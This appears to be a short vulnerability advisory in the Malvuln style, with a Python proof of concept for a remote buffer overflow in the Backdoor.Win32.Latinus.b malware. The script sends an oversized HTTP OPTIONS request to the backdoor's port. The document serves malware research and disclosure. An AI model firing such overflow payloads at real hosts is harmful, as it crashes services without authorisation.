Backdoor.Win32.Latinus.b Remote Buffer Overflow

Backdoor.Win32.Latinus.b Remote Buffer Overflow

Backdoor.Win32.Latinus.b malware suffers from a remote buffer overflow vulnerability.

Exploit/PoC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=29559

def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
PAYLOAD="OPTIONS /"+"A"*8945+ " HTTP/1.1\r\nHost: "+MALWARE_HOST+"\r\n\r\n"
s.send(PAYLOAD)
s.close()
print("Backdoor.Win32.Latinus.b / Remote Buffer Overflow ")
print("MD5: 9adffcc98cd658a7f9c5419480013f72")
print("By Malvuln")

if __name__=="__main__":
doit()